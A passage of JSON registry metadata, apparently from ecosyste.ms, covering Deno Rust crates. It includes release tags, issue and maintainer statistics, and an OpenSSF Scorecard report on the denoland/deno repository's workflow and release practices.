v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T20:11:21.954Z","dependent_packages_count":0,"downloads":18591,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":94.79306022268806,"dependent_repos_count":21.680388097909393,"dependent_packages_count":28.714926072826298,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":48.396124797807914},"purl":"pkg:cargo/deno_npm_installer","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_npm_installer","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_npm_installer","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_npm_installer/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_npm_installer/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-05-19T15:40:04.104Z","updated_at":"2025-05-19T15:40:04.104Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-05-15T20:22:31.370Z","updated_at":"2025-05-15T20:22:31.370Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":9206822,"name":"deno_permissions","ecosystem":"cargo","description":"Provides the deno permissions implementation.","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":117,"first_release_published_at":"2024-03-13T16:42:53.511Z","latest_release_published_at":"2026-08-27T15:19:53.084Z","latest_release_number":"0.117.0","last_synced_at":"2026-09-07T22:55:10.617Z","created_at":"2024-03-13T16:47:36.974Z","updated_at":"2026-09-07T22:55:10.618Z","registry_url":"https://crates.io/crates/deno_permissions/","install_command":"cargo install deno_permissions","documentation_url":"https://docs.rs/deno_permissions/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using 